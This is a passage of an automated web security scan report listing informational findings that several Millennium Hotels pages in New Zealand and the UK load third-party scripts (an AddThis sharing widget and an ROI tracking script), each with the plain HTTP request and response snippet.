Content-Length: 61774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.629. http://www.millenniumhotels.co.nz/copthornehokianga/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornehokianga/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornehokianga/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:04:31 GMT
ETag: "21643-c810-73a3d429"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.630. http://www.millenniumhotels.co.nz/copthornemarlborough/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornemarlborough/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornemarlborough/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:29 GMT
ETag: "2100c-c7ce-20a0abe7"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.631. http://www.millenniumhotels.co.nz/copthornenewplymouth/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornenewplymouth/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornenewplymouth/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:26 GMT
ETag: "217be-c7ca-20754781"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.632. http://www.millenniumhotels.co.nz/copthorneorientalbay/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthorneorientalbay/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthorneorientalbay/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:04:23 GMT
ETag: "21b5a-c9fa-731f81a6"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.633. http://www.millenniumhotels.co.nz/copthornequeenstownlakefront/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornequeenstownlakefront/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornequeenstownlakefront/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:04:12 GMT
ETag: "21d5f-c960-9be441ef"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.634. http://www.millenniumhotels.co.nz/copthornewairarapa/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornewairarapa/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornewairarapa/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:04:18 GMT
ETag: "256fd-c9f0-496b6211"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.635. http://www.millenniumhotels.co.nz/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:10 GMT
ETag: "21da5-248b1-1f8901aa"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.636. http://www.millenniumhotels.co.nz/kingsgateauckland/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgateauckland/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgateauckland/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:04:08 GMT
ETag: "28ff9-c9ac-723ead7f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.637. http://www.millenniumhotels.co.nz/kingsgatedunedin/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatedunedin/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgatedunedin/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:05 GMT
ETag: "21804-ca24-1f35cc65"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.638. http://www.millenniumhotels.co.nz/kingsgategreymouth/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgategreymouth/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgategreymouth/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:04:04 GMT
ETag: "27548-c94b-489824eb"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.639. http://www.millenniumhotels.co.nz/kingsgatehamilton/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatehamilton/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgatehamilton/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:03:51 GMT
ETag: "22466-c86a-9aadd629"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.640. http://www.millenniumhotels.co.nz/kingsgateoamaru/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgateoamaru/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgateoamaru/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:55 GMT
ETag: "23b3e-c95f-1e9f1e2d"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.641. http://www.millenniumhotels.co.nz/kingsgatepaihia/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatepaihia/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgatepaihia/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:52 GMT
ETag: "27e8c-c68b-1e769633"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 50827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.642. http://www.millenniumhotels.co.nz/kingsgatepalmerstonnorth/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatepalmerstonnorth/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgatepalmerstonnorth/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:50 GMT
ETag: "28ae6-c7b0-1e4f7c6f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.643. http://www.millenniumhotels.co.nz/kingsgatequeenstown/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatequeenstown/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgatequeenstown/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:03:46 GMT
ETag: "225a9-c792-70eb2b6f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.644. http://www.millenniumhotels.co.nz/kingsgaterotorua/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgaterotorua/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgaterotorua/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:03:43 GMT
ETag: "265d4-cb1c-70c2a375"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.645. http://www.millenniumhotels.co.nz/kingsgateteanau/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgateteanau/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgateteanau/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:03:33 GMT
ETag: "2927b-c9f7-999e0a15"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.646. http://www.millenniumhotels.co.nz/kingsgatewanganui/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatewanganui/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgatewanganui/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:38 GMT
ETag: "373c8-c968-1da3d31f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.647. http://www.millenniumhotels.co.nz/kingsgatewellington/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatewellington/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgatewellington/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:36 GMT
ETag: "279ba-cacf-1d7b882e"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.648. http://www.millenniumhotels.co.nz/kingsgatewhangarei/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatewhangarei/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /kingsgatewhangarei/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:03:35 GMT
ETag: "277aa-cabc-46d827dc"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.649. http://www.millenniumhotels.co.nz/millenniumchristchurch/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/millenniumchristchurch/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumchristchurch/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:29 GMT
ETag: "27971-cd71-1d19c7c4"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.650. http://www.millenniumhotels.co.nz/millenniumqueenstown/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/millenniumqueenstown/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumqueenstown/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:26 GMT
ETag: "27bd9-cd2a-1ce516ff"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.651. http://www.millenniumhotels.co.nz/millenniumrotorua/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/millenniumrotorua/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumrotorua/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:03:21 GMT
ETag: "27d11-cc0a-6f71c0c8"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.652. http://www.millenniumhotels.co.nz/millenniumtaupo/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/millenniumtaupo/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumtaupo/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:03:21 GMT
ETag: "29289-cace-4606d2fe"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.653. http://www.millenniumhotels.co.uk/copthorneaberdeen/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthorneaberdeen/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthorneaberdeen/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
